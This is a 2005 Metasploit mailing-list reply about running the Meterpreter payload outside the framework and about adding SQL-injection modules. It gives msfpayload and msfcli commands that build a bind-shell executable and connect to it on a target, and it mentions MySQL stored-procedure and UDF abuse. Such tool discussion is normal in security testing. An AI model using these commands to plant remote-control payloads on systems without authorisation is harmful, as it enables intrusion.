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using Meterpreter , out of MSF // SQL Injection module

From: hdm at (H D Moore)
Date: Tue, 25 Oct 2005 23:11:19 -0500

On Tuesday 25 October 2005 19:07, Hamid . K wrote:
I was curious , if anyone tried to load meterpreter
library , out of framework ?

The easy way:
$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it. 
After executing it, you can use the "payload_handler" exploit to connect 
and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 \
RHOST=<target_system> E

Alternatively, you can use the source code in ./src and just build your 
own client/server implementation using it.

Second ;
Is the idea of adding an automated sql-injection
module to MSF .

The problem there is that version 2.x is exploit-driven - if you can't use 
one of the standard payloads or accomplish a very specific task, then it 
means writing a whole library around post-sql-injection remote 
compromise. Adding a mysql module means creating paylaods for uploading 
files or executing commands via the mysql stored procedures (load data 
infile, the UDF stuff that abuses blank passwords, etc). If someone came 
up with some plausible/useful payloads that would work with generic SQL 
injection, I would definitely be interested in integrating it. Version 
3.x is going to include "recon" modules, so a generic table enumeration 
module would fit into it much better than 2.x.


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